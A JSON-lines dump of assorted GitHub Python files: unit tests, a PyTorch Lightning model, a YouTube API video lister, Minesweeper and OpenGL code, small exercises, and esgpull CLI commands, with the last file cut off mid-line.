+{"seq_id":"35116291904","text":"import mock\r\nimport numpy as np\r\nimport unittest\r\n\r\nfrom dotscanner.ui.MicroscopeImage import MicroscopeImage\r\nfrom tests.ui.FakeUserSettings import FakeUserSettings\r\n\r\n\r\nclass TestMicroscopeImage(unittest.TestCase):\r\n @mock.patch(\"dotscanner.dataprocessing.getData\")\r\n def getMicroscopeImageAndUserSettings(self, mock_getData):\r\n mock_getData.return_value = np.array([\r\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n [0, 5, 8, 0, 0, 1, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n [0, 10, 0, 0, 0, 0, 0, 0, 0],\r\n [0, 0, 0, 7, 0, 0, 0, 0, 1],\r\n [0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n ])\r\n userSettings = FakeUserSettings(\r\n filepath=\"test/directory/\", dotSize=2, blobSize=5, saveFigures=False,\r\n startImage=\"fakeImage01.png\", skipsAllowed=3, removeEdgeFrames=True, lowerContrast=0.0,\r\n upperContrast=5.0, lowerDotThresh=1.5, upperDotThresh=5.0, lowerBlobThresh=2.0,\r\n program=\"density\", polygon=None)\r\n\r\n return MicroscopeImage(\"test/directory/\", \"filename.png\", userSettings), userSettings\r\n\r\n def test_properLoading_whenClassInitializes(self):\r\n microscopeImage, userSettings = self.getMicroscopeImageAndUserSettings()\r\n\r\n self.assertEqual(userSettings.dotSize, 2)\r\n self.assertEqual(userSettings.blobSize, 5)\r\n self.assertEqual(userSettings.saveFigures, False)\r\n self.assertEqual(userSettings.startImage, \"fakeImage01.png\")\r\n self.assertEqual(userSettings.skipsAllowed, 3)\r\n self.assertEqual(userSettings.removeEdgeFrames, True)\r\n self.assertEqual(microscopeImage.thresholds, (1.5, 5.0, 2.0))\r\n self.assertIn(3, microscopeImage.dotCoords)\r\n self.assertIn(1, microscopeImage.dotCoords[3])\r\n self.assertEqual(microscopeImage.blobCoords, {})\r\n\r\n @mock.patch('settings.config.THRESHOLD_DELTA', 0.1)\r\n @mock.patch('settings.config.LOWER_DOT_THRESH_SCALE', 1.5)\r\n def test_decreaseLowerDotThreshScale(self):\r\n microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n microscopeImage.decreaseLowerDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.lowerDotThreshScale, 1.4)\r\n\r\n microscopeImage.decreaseLowerDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.lowerDotThreshScale, 1.3)\r\n\r\n @mock.patch('settings.config.THRESHOLD_DELTA', 0.1)\r\n @mock.patch('settings.config.LOWER_DOT_THRESH_SCALE', 1.5)\r\n def test_increaseLowerDotThreshScale(self):\r\n microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n microscopeImage.increaseLowerDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.lowerDotThreshScale, 1.6)\r\n\r\n microscopeImage.increaseLowerDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.lowerDotThreshScale, 1.7)\r\n\r\n @mock.patch('settings.config.THRESHOLD_DELTA', 0.1)\r\n @mock.patch('settings.config.UPPER_DOT_THRESH_SCALE', 5.0)\r\n def test_decreaseUpperDotThreshScale(self):\r\n microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n microscopeImage.decreaseUpperDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.upperDotThreshScale, 4.9)\r\n\r\n microscopeImage.decreaseUpperDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.upperDotThreshScale, 4.8)\r\n\r\n @mock.patch('settings.config.THRESHOLD_DELTA', 0.1)\r\n @mock.patch('settings.config.UPPER_DOT_THRESH_SCALE', 5.0)\r\n def test_increaseUpperDotThreshScale(self):\r\n microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n microscopeImage.increaseUpperDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.upperDotThreshScale, 5.1)\r\n\r\n microscopeImage.increaseUpperDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.upperDotThreshScale, 5.2)\r\n\r\n def test_setThresholds(self):\r\n microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n microscopeImage.setThresholds((1.26, 5.2, 3))\r\n\r\n self.assertEqual(microscopeImage.thresholds, (1.3, 5.2, 3.0))\r\n\r\n def test_updateThresholds(self):\r\n microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n microscopeImage.lowerDotThreshScale = 1.2\r\n microscopeImage.lowerBlobThreshScale = 2.2\r\n microscopeImage.updateThresholds()\r\n\r\n self.assertEqual(microscopeImage.thresholds, (1.2, 5.0, 2.2))\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"bdavis222/dotscanner","sub_path":"tests/ui/test_MicroscopeImage.py","file_name":"test_MicroscopeImage.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"17079804246","text":"import re\n\nfin = open(\"a.txt\", \"r\")\ntxt = fin.read()\nfin.close()\ncropped = re.findall(\"Tip \\d+(?:.*\\n){1,3}.*\", txt)\ncropped.pop(2)\ncropped = [str(i).replace(\"\\n\", \":\", 1).replace(\"\\n\", \"\") for i in cropped]\nfout = open(\"Tips.txt\", \"w\")\nfor j in cropped:\n fout.write(j + \"\\n\\n\")\nfout.close()\n","repo_name":"enesgarip/tipstotxt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1927838398","text":"from typing import Optional, Any, List\nfrom cffi import model\n\nimport torch\nfrom torch import nn\n\nimport pytorch_lightning as pl\n\nfrom torchmetrics import MeanAbsoluteError, MeanSquaredError, MetricCollection\n\nfrom utils import Normalizer\nfrom torch_geometric.data import Batch\n\n\nclass EnergyModel(pl.LightningModule):\n def __init__(\n self,\n model: nn.Module,\n lr: int = 1e-3,\n weight_decay: float = 0.0,\n normalize_labels: bool = False,\n mean: Optional[float] = None,\n std: Optional[float] = None,\n ):\n super().__init__()\n self.save_hyperparameters(ignore=[\"model\"])\n self.model = model\n self.criterion = nn.L1Loss()\n self.normalize_labels = normalize_labels\n if self.normalize_labels:\n mean = 0 if mean is None else mean\n std = 1 if std is None else std\n self.normalizer = Normalizer(mean=mean, std=std, device=self.device)\n\n metrics = MetricCollection([MeanAbsoluteError(), MeanSquaredError()])\n self.train_metrics = metrics.clone(prefix=\"train/\")\n self.val_metrics = metrics.clone(prefix=\"val/\")\n\n def forward(self, x: Batch):\n output = self.model(x)\n\n if output.shape[-1] == 1:\n output = output.view(-1)\n\n return output\n\n def step(self, batch: Batch):\n preds = self.forward(batch)\n targets = batch.y_relaxed\n\n if self.normalize_labels:\n norm_targets = self.normalizer.norm(targets)\n denorm_preds = self.normalizer.denorm(preds)\n loss = self.criterion(preds, norm_targets)\n return loss, denorm_preds, targets\n\n loss = self.criterion(preds, targets)\n\n return loss, preds, targets\n\n def training_step(self, batch: Batch, batch_idx: int):\n loss, preds, targets = self.step(batch)\n\n # log train metrics\n self.log(\"train/loss\", loss, on_step=True, on_epoch=True, prog_bar=False)\n self.log_dict(\n self.train_metrics(preds, targets),\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n\n # we can return here dict with any tensors\n # and then read it in some callback or in training_epoch_end() below\n # remember to always return loss from training_step, or else backpropagation will fail!\n return {\"loss\": loss, \"preds\": preds, \"targets\": targets}\n\n def training_epoch_end(self, outputs: List[Any]):\n # `outputs` is a list of dicts returned from `training_step()`\n pass\n\n def validation_step(self, batch: Batch, batch_idx: int):\n loss, preds, targets = self.step(batch)\n\n # log val metrics\n self.log(\"val/loss\", loss, on_step=False, on_epoch=True, prog_bar=False)\n self.log_dict(\n self.val_metrics(preds, targets),\n on_step=False,\n on_epoch=True,\n prog_bar=True,\n )\n\n return {\"loss\": loss, \"preds\": preds, \"targets\": targets}\n\n def validation_epoch_end(self, outputs: List[Any]):\n pass\n\n def test_step(self, batch: Batch, batch_idx: int):\n pass\n\n def test_epoch_end(self, outputs: List[Any]):\n pass\n\n def configure_optimizers(self):\n optimizer = torch.optim.AdamW(\n params=self.model.parameters(),\n lr=self.hparams.lr,\n weight_decay=self.hparams.weight_decay,\n )\n return [optimizer], []\n","repo_name":"Irlirion/ocp-lightning","sub_path":"src/models/energy_model.py","file_name":"energy_model.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5828384199","text":"dias_uteis = int(input(\"Quantos dias úteis teve no mês? \"))\r\nhoras_trabalho = float(input(\"Quantas horas foram trabalhadas pelo trabalhador? \"))\r\nsala_hora = float(input(\"Quantos reais você ganha por hora? \"))\r\nhora_total = dias_uteis * 8\r\nsalario =sala_hora * hora_total\r\n# print(salario)\r\nif horas_trabalho > hora_total:\r\n \r\n salario_extra = (horas_trabalho - hora_total) * sala_hora / 2\r\n salario = round (salario_extra + salario,2)\r\n print(salario)\r\nelse:\r\n salario = round (sala_hora * hora_total,2)\r\n print(salario)\r\n ","repo_name":"Abner-Ferreira/Python_Exercicios","sub_path":"estrutura_if/ex05.py","file_name":"ex05.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24965054952","text":"import urllib.request\nimport json\nimport math\nimport sys\n\n#Get list of videos from Youtube channel\ndef getVideos(maxResults, uploadId, key,nextPageToken, videosOutput):\n videos = []\n # construct the API url\n urld = searchURL+\"/playlistItems?part=snippet%2CcontentDetails&maxResults=\"+maxResults+\"&playlistId=\"+uploadId+\"&key=\"+key+\"&pageToken=\"+nextPageToken \n # open the API url and read the response\n with urllib.request.urlopen(urld) as url:\n datad = json.loads(url.read())\n # print the URL for debugging purposes\n print(urld)\n \n # loop through the items in the response\n for data in datad['items']:\n # get the title and video id\n ntitle = data['snippet']['title']\n nlink = data['contentDetails']['videoId']\n # add the video information to the output list\n videosOutput.append([nlink,ntitle])\n # check if there's a next page token\n if 'nextPageToken' in datad:\n nextPageToken = datad['nextPageToken']\n #recursive call \n getVideos(maxResults, uploadId, key, nextPageToken, videosOutput)\n\n# API key for accessing the YouTube API\nkey = \"API_KEY\"\n# base URL for a YouTube video\nvideoURL = \"http://www.youtube.com/watch?v=\"\n# base URL for the YouTube API\nsearchURL = \"https://www.googleapis.com/youtube/v3\"\n# maximum number of results to retrieve per API call\nmaxResults= \"50\"\n# variable to keep track of the next page token\nnextPageToken = \"\"\n\n#List of channels : mention if you are pasting channel id or username - \"id\" or \"forUsername\"\nytids = []\n# open the input file containing the list of channels\nwith open(sys.argv[1]) as file:\n ytids = file.read().splitlines() \nfile.close() \nvideos = []\n\n# loop through the list of channels\nfor ytid in ytids:\n # construct the API url to get the channel's details\n urld = searchURL+\"/channels?part=contentDetails&id=\"+ytid+\"&key=\"+key \n # open the API url and read the response\n with urllib.request.urlopen(urld) as url:\n datad = json.loads(url.read())\n # print the response for debugging purposes\n print(datad)\n # get the channel's uploads details\n uploadsdet = datad['items']\n \n# loop through the videos and print their URLs and titles\nfor link,title in videos:\n print(videoURL+link, title)\n","repo_name":"pdelteil/youtubeDownloader","sub_path":"getVideoURLsFromChannels.py","file_name":"getVideoURLsFromChannels.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1214926601","text":"# Copyright (c) 2023 Alexa George-Catalin. All rights reserved.\r\nimport threading\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom utils import cell_interactions\r\nfrom utils import restart_game\r\nfrom utils import drawing_table\r\nfrom utils import countdown\r\ndef initialize_game(\r\n game_width,\r\n game_height,\r\n bomb_count,\r\n top_frame,\r\n win,\r\n game_frame,\r\n second_count,\r\n):\r\n \"\"\"Setează datele jocului când este necesar (la prima inițializare a jocului sau la un restart al acestuia)\"\"\"\r\n game_width = int(game_width)\r\n game_height = int(game_height)\r\n mine_cells = cell_interactions.create_mines(game_width, game_height, bomb_count)\r\n neighbour_mines = cell_interactions.show_neighbours(game_width, game_height, mine_cells)\r\n is_flagged = []\r\n for i in range(game_height):\r\n is_flagged.append([])\r\n for j in range(game_width):\r\n is_flagged[i].append(False)\r\n\r\n restart_button = ttk.Button(\r\n top_frame,\r\n text=\"Restart\",\r\n command=lambda: restart_game.restart(\r\n win,\r\n bomb_count,\r\n game_frame,\r\n top_frame,\r\n game_width,\r\n game_height,\r\n bomb_count,\r\n restart_button,\r\n second_count,\r\n ),\r\n )\r\n win.update()\r\n restart_button.place(relx=0.5, rely=0.5, anchor=\"center\")\r\n\r\n drawn_cells = drawing_table.draw_table(\r\n int(game_width),\r\n int(game_height),\r\n game_frame,\r\n mine_cells,\r\n win,\r\n neighbour_mines,\r\n is_flagged,\r\n top_frame,\r\n game_width,\r\n game_height,\r\n bomb_count,\r\n restart_button,\r\n second_count,\r\n )\r\n for i in range(int(game_height)):\r\n for j in range(int(game_width)):\r\n drawn_cells[i][j].bind(\r\n \"\",\r\n lambda e, row=i, column=j: cell_interactions.flagger(\r\n row,\r\n column,\r\n drawn_cells,\r\n is_flagged,\r\n ),\r\n )\r\n\r\n second = StringVar()\r\n second.set(str(second_count))\r\n second_label = Label(\r\n top_frame,\r\n width=5,\r\n font=(\"Arial\", 13, \"\"),\r\n textvariable=second,\r\n bg=\"#7c8d91\",\r\n fg=\"red\",\r\n )\r\n second_label.place(x=0, y=0)\r\n\r\n temp = int(second.get())\r\n th = threading.Thread(\r\n target=countdown.timer,\r\n args=[\r\n temp,\r\n second,\r\n win,\r\n game_frame,\r\n top_frame,\r\n game_width,\r\n game_height,\r\n bomb_count,\r\n restart_button,\r\n second_count,\r\n ],\r\n )\r\n th.start()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"AlexaGeorgeCatalin/Minesweeper","sub_path":"utils/game_initialization.py","file_name":"game_initialization.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25572728737","text":"a=input(\"please tell about status about Harry Rohan and hamad \")\np=int(input(\"1 and 2\"))\nif a==\"harry\" and p==1:\n x=open(\"f1.txt\",'r')\n o= x.read()\n print(o)\nelif a==\"harry\" and p==2:\n x1=open('f2.txt','r')\n o1=x1.read()\n print(o1)\nelif a==\"rohan\" and p==1:\n s=open(\"f3.txt\",'r')\n s1=s.read()\n print(s1)\nelif a=='rohan' and p==2:\n c=open(\"f4.txt\",'r')\n c1=c.read()\n print(c1)\nelif a==\"hamad \" and p==1:\n v=open(\"f5.txt\",'r')\n v1=v.read()\n print(v1)\nelif a=='hamad' and p==2:\n k=open('f6.txt',\"r\")\n k1= k.read()\n print(k1)\n# else:\n# print(\"you dial in valid\")","repo_name":"joshistavan/summer__python","sub_path":"ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42917488113","text":"from OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom Prisma import *\nfrom random import Random\nimport sys\n\ntotal_sides = 3\nmax_sides = 15\nmin_sides = 3\n\nangle = 0\n\nangle_x = angle_y = angle_z = 0\n\nprism = Prisma(total_sides)\n\n\ndef draw():\n global angle, angle_x, angle_y, angle_z\n\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n glPushMatrix()\n glRotatef(angle, angle_x, angle_y, angle_z)\n prism.draw()\n glPopMatrix()\n\n angle += 10\n angle_x += Random().randrange(0, 2)\n angle_y += Random().randrange(0, 10)\n angle_z += Random().randrange(0, 5)\n\n glutSwapBuffers()\n\n\ndef timer(_):\n glutPostRedisplay()\n glutTimerFunc(50, timer, 1)\n\n\ndef reshape(w, h):\n glViewport(0, 0, w, h)\n glMatrixMode(GL_PROJECTION)\n gluPerspective(45, float(w) / float(h), 0.1, 30.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\n where = (4, 0, 0)\n to = (0, 0, 0)\n direction = (1, 1, 0)\n gluLookAt(*where, *to, *direction)\n\n\ndef init():\n mat_ambient = (0.5, 1.0, 0.0, 1.0)\n mat_diffuse = (0.0, 1.0, 0.0, 1.0)\n mat_specular = (0.0, 1.0, 0.0, 1.0)\n mat_shininess = (100,)\n\n glClearColor(0.0, 0.0, 0.0, 0.0)\n glShadeModel(GL_FLAT)\n\n glMaterialfv(GL_FRONT, GL_AMBIENT, mat_ambient)\n glMaterialfv(GL_FRONT, GL_DIFFUSE, mat_diffuse)\n glMaterialfv(GL_FRONT, GL_SPECULAR, mat_specular)\n glMaterialfv(GL_FRONT, GL_SHININESS, mat_shininess)\n\n # Iluminação\n light_position = (0, 30, -10)\n glEnable(GL_LIGHTING)\n glEnable(GL_LIGHT0)\n glLightfv(GL_LIGHT0, GL_POSITION, light_position)\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_MULTISAMPLE)\n\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n glBegin(GL_TRIANGLES);\n glColor3f(1, 0, 0);\n glVertex2f(-0.8, -0.8);\n glColor3f(0, 1, 0);\n glVertex2f(0.8, -0.8);\n glColor3f(0, 0, 1);\n glVertex2f(0, 0.9);\n glEnd();\n\n\ndef init_glut():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGBA | GLUT_DEPTH | GLUT_MULTISAMPLE)\n glutInitWindowSize(1280, 720)\n glutCreateWindow(\"Prisma | Piramide\")\n glutReshapeFunc(reshape)\n glutDisplayFunc(draw)\n glutTimerFunc(50, timer, 1)\n init()\n glutMainLoop()\n\n\nif __name__ == '__main__':\n init_glut()\n","repo_name":"mhbarros/computacao-grafica","sub_path":"P2/4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1790468241","text":"# Borrowed from Pytorch3D\n\nimport torch\nfrom typing import NamedTuple\nimport torch.nn as nn\nfrom typing import Sequence, Union\n\n\ndef convert_to_tensors_and_broadcast(*args, dtype: torch.dtype = torch.float32,):\n \"\"\"\n Helper function to handle parsing an arbitrary number of inputs (*args)\n which all need to have the same batch dimension.\n The output is a list of tensors.\n\n Args:\n *args: an arbitrary number of inputs\n Each of the values in `args` can be one of the following\n - Python scalar\n - Torch scalar\n - Torch tensor of shape (N, K_i) or (1, K_i) where K_i are\n an arbitrary number of dimensions which can vary for each\n value in args. In this case each input is broadcast to a\n tensor of shape (N, K_i)\n dtype: data type to use when creating new tensors.\n\n Output:\n args: A list of tensors of shape (N, K_i)\n \"\"\"\n # Convert all inputs to tensors with a batch dimension\n args_1d = [format_tensor(c, dtype) for c in args]\n\n # Find broadcast size\n sizes = [c.shape[0] for c in args_1d]\n N = max(sizes)\n\n args_Nd = []\n for c in args_1d:\n if c.shape[0] != 1 and c.shape[0] != N:\n msg = \"Got non-broadcastable sizes %r\" % sizes\n raise ValueError(msg)\n\n # Expand broadcast dim and keep non broadcast dims the same size\n expand_sizes = (N,) + (-1,) * len(c.shape[1:])\n args_Nd.append(c.expand(*expand_sizes))\n\n if len(args) == 1:\n args_Nd = args_Nd[0] # Return the first element\n\n return args_Nd\n\n\ndef format_tensor(input, dtype: torch.dtype = torch.float32,) -> torch.Tensor:\n \"\"\"\n Helper function for converting a scalar value to a tensor.\n\n Args:\n input: Python scalar, Python list/tuple, torch scalar, 1D torch tensor\n dtype: data type for the input\n device: Device (as str or torch.device) on which the tensor should be placed.\n\n Returns:\n input_vec: torch tensor with optional added batch dimension.\n \"\"\"\n if not torch.is_tensor(input):\n input = torch.tensor(input, dtype=dtype)\n\n if input.dim() == 0:\n input = input.view(1)\n\n return input\n\n\nclass BlendParams(NamedTuple):\n \"\"\"\n Data class to store blending params with defaults\n\n Members:\n sigma (float): Controls the width of the sigmoid function used to\n calculate the 2D distance based probability. Determines the\n sharpness of the edges of the shape.\n Higher => faces have less defined edges.\n gamma (float): Controls the scaling of the exponential function used\n to set the opacity of the color.\n Higher => faces are more transparent.\n background_color: RGB values for the background color as a tuple or\n as a tensor of three floats.\n \"\"\"\n\n sigma: float = 1e-4\n gamma: float = 1e-4\n background_color: Union[torch.Tensor, Sequence[float]] = (1.0, 1.0, 1.0)","repo_name":"shivangi-aneja/ClipFace","sub_path":"model/renderer/illumination/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"60"} +{"seq_id":"4461934225","text":"import random\n\ndef MakeAnswer():\n global chiken,rabbit,ChikenLeg,RabbitLeg\n chiken = random.randint(1,20)\n rabbit = random.randint(1,20)\n ChikenLeg = chiken * 2\n RabbitLeg = rabbit * 4\n return chiken,rabbit,ChikenLeg,RabbitLeg\n\ndef CheckWrong(InputSay):\n Wrong = True\n global temp\n while Wrong:\n try:\n temp = int(input(InputSay))\n except ValueError:\n print('输入错误,你只能输入整数!')\n else:\n Wrong = False\n return temp\n\ndef CheckAnswer(InputRabbit,InputChiken,Rabbit,Chiken):\n if InputChiken == Chiken:\n print(\"鸡的数量正确!\")\n else:\n print(\"鸡的数量不正确!!实际上有\"+str(chiken)+\"只鸡在笼子里!.\")\n\n if InputRabbit == rabbit:\n print(\"兔子的数量正确!\")\n else:\n print(\"兔子的数量不正确!!实际上有\"+str(chiken)+\"只兔子在笼子里!.\")\n\nwhile True:\n MakeAnswer()\n print(\"笼子里有\"+str(chiken+rabbit)+\"个头.有\"+str(ChikenLeg+RabbitLeg)+\"只腿在地上.\")\n CheckWrong('有多少兔子在笼子里?')\n InputRabbit = temp\n CheckWrong('有多少鸡在笼子里?')\n InputChiken = temp\n CheckAnswer(InputRabbit,InputChiken,rabbit,chiken)\n","repo_name":"gjc2010gys/BadboyKillerChinese","sub_path":"鸡兔同笼.py","file_name":"鸡兔同笼.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22637166543","text":"import matplotlib.pyplot as plt\n\nlabels = 'German', 'English', 'Others (all < 1%)'\nsizes = [83, 11, 6]\nexplode = (0.1, 0, 0) # only \"explode\" the 1ST slice\n\nfig1, ax1 = plt.subplots()\n\nax1.pie(sizes, explode=explode, labels=labels, colors= ['#756bb1', '#bcbddc', '#c7c5cd'], autopct='%1.0f%%',\n shadow=False, startangle=90)\nax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.\nax1.set_title(\"Language of all #IchbinHanna Tweets\")\nplt.savefig('../pie_users.png', dpi=300)\nplt.show()\n","repo_name":"LaserStefan/IchbinHanna","sub_path":"code/piechart.py","file_name":"piechart.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"60"} +{"seq_id":"15442619046","text":"n,k = map(int,input().split())\n\nm = 10**9 + 7\n\n\n\n#print(ans)\n\nrr = 0\nmx = 0\nmn = 0\nfor i in range(k):\n mx += (n-i)%m\n mn += i%m\n\n#print(mx)\n#print(mn)\n#print(\"-------\")\nrr = mx-mn+1\n#print(rr)\n#print(\"-------\")\npp = rr\nfor j in range(k+1,n+2):\n mn_p = j-1\n mx_p = n-j+1\n #print(mn_p,mx_p)\n if(mx_p==0 or mn_p == n):\n pp += 1\n break\n else:\n pp += rr +mx_p - mn_p\n rr = rr +mx_p - mn_p\n #print(pp)\n \n \n \nprint(pp%m) \n \n \n","repo_name":"na2shell/AtCoder","sub_path":"contest/abc163/ABC163-D.py","file_name":"ABC163-D.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27055012885","text":"\"\"\"Bonus: agrega otras figuras geométricas a tu programa y que el usuario pueda escoger cuál calcular.\n\"\"\"\n\nimport math\n\nPI = math.pi\n \n\ndef main(): \n intro = \"\"\"\n Select a geometric figure: \n 1 -> Cilinder\n 2 -> Pyramid\n 3 -> Cone\n 4 -> Cube\n 5 -> Sphere\n\n Option: \"\"\" \n\n option = int(input(intro)) \n\n if option == 1:\n vol_cilinder()\n elif option == 2:\n vol_pyramid()\n elif option == 3:\n vol_cone()\n elif option == 4:\n vol_cube()\n elif option == 5:\n vol_sphere()\n else:\n print(\"Select a correct option\")\n\n\ndef vol_cilinder():\n height = int(input(\"Type de cilinder's height in cm: \"))\n radius = int(input(\"Type de cilinder's radius in cm: \"))\n area = PI * (radius**2)\n vol_cil = round((area * height), 2)\n print(f\"The cilinder's volume is: {vol_cil} cubic cm\")\n\n \ndef vol_pyramid():\n side_a = int(input(\"Type de triangle's side_a in cm: \"))\n side_b = int(input(\"Type de triangle's side_b in cm: \"))\n height = int(input(\"Type de triangle's heigh in cm: \"))\n vol_pyr = (side_a * side_b * height) / 3\n print(f\"The triangle's volume is: {vol_pyr} cubic cm\")\n\ndef vol_cone():\n radius = int(input(\"Type de cone's radius in cm: \"))\n height = int(input(\"Type de cone's heigh in cm: \"))\n vol_con = (PI * (radius**2) * height) / 3\n print(f\"The cone's volume is: {vol_con} cubic cm\")\n\n\ndef vol_cube():\n side_a = int(input(\"Type de cube's side_a in cm: \"))\n side_b = int(input(\"Type de cube's side_b in cm: \"))\n height = int(input(\"Type de cube's heigh in cm: \"))\n vol_cub = side_a * side_b * height\n print(f\"The cube's volume is: {vol_cub} cubic cm\")\n\n\ndef vol_sphere():\n radius = int(input(\"Type de sphere's radius in cm: \"))\n vol_sph = (4 * PI * (radius**3)) / 3\n print(f\"The sphere's volume is: {vol_sph} cubic cm\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"isabelyb/datacademy_platzi","sub_path":"04_challenge_4_bonus.py","file_name":"04_challenge_4_bonus.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12775505566","text":"from __future__ import annotations\n\nimport click\nfrom click.exceptions import Abort, Exit\nfrom rich.box import MINIMAL_DOUBLE_HEAD\nfrom rich.table import Table\nfrom rich.text import Text\n\nfrom esgpull.cli.decorators import args, opts\nfrom esgpull.cli.utils import init_esgpull, valid_name_tag\nfrom esgpull.tui import Verbosity\n\n\n@click.command()\n@args.query_ids\n@opts.record\n@opts.verbosity\ndef track(\n query_ids: tuple[str],\n record: bool,\n verbosity: Verbosity,\n) -> None:\n \"\"\"\n Track queries\n\n As a side effect, tracking a query applies all default options to the query,\n so that modifications of the config's default options have no impact on\n previouly tracked queries.\n \"\"\"\n esg = init_esgpull(verbosity, record=record)\n with esg.ui.logging(\"track\", onraise=Abort):\n for sha in query_ids:\n if not valid_name_tag(esg.graph, esg.ui, sha, None):\n esg.ui.raise_maybe_record(Exit(1))\n query = esg.graph.get(sha)\n if query.tracked:\n esg.ui.print(f\"{query.rich_name} is already tracked.\")\n esg.ui.raise_maybe_record(Exit(0))\n if esg.graph.get_children(query.sha):\n msg = f\"{query.rich_name} has children, track anyway?\"\n if not esg.ui.ask(msg, default=False):\n esg.ui.raise_maybe_record(Abort)\n expanded = esg.graph.expand(query.sha)\n tracked_query = query.clone(compute_sha=False)\n tracked_query.track(expanded.options)\n if query.sha != tracked_query.sha:\n msg = f\"For {query.rich_name} to become tracked, options must be set.\"\n esg.ui.print(msg)\n table = Table(\n box=MINIMAL_DOUBLE_HEAD,\n show_edge=False,\n show_lines=True,\n )\n table.add_column(Text(\"before\", justify=\"center\"))\n table.add_column(Text(\"after\", justify=\"center\"))\n table.add_row(query, tracked_query)\n esg.ui.print(table)\n if not esg.ui.ask(\"Apply changes?\"):\n esg.ui.raise_maybe_record(Abort)\n esg.graph.replace(query, tracked_query)\n esg.graph.merge()\n esg.ui.print(f\":+1: {tracked_query.rich_name} is now tracked.\")\n esg.ui.raise_maybe_record(Exit(0))\n\n\n@click.command()\n@args.query_ids\n@opts.verbosity\ndef untrack(\n query_ids: tuple[str],\n verbosity: Verbosity,\n) -> None:\n \"\"\"\n Untrack queries\n \"\"\"\n esg = init_esgpull(verbosity)\n with esg.ui.logging(\"untrack\", onraise=Abort):\n for sha in query_ids:\n if not valid_name_tag(esg.graph, esg.ui, sha, None):\n raise Exit(1)\n query = esg.graph.get(sha)\n if not query.tracked:\n esg.ui.print(f\"Query {query.rich_name} is already untracked.\")\n raise Exit(0)\n query.untrack()\n esg.graph.merge()\n esg.ui.print(f\":+1: Query {query.rich_name} is no longer tracked.\")\n","repo_name":"ESGF/esgf-download","sub_path":"esgpull/cli/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"60"} +{"seq_id":"19724588039","text":"from __future__ import division\nfrom __future__ import print_function\nimport numpy as np\nfrom PIL import Image\nfrom random import randint\n\n\nfor n in range(0,400):\n\t#import time\n\t#date_string = time.strftime(\"%Y-%m-%d-%H:%M:%S\")\n#Initialize the matrix- Size (100,100)\n\tsize = 100\n\tarr = np.zeros((size,size))\n\n#Initialize the Gaussian Properties\n\n\tx0 = randint(1,100); y0 = randint(1,100); sigmax = randint(1,10); sigmay = randint(1,10)\n\n\tcenter = (x0,y0)\n\tprint (center)\n#Create the Gaussian Function\n\n\tdef Gaussian(x,y):\n\t\tresult = int(round( 255*np.exp(-(x - x0)**2 / (2 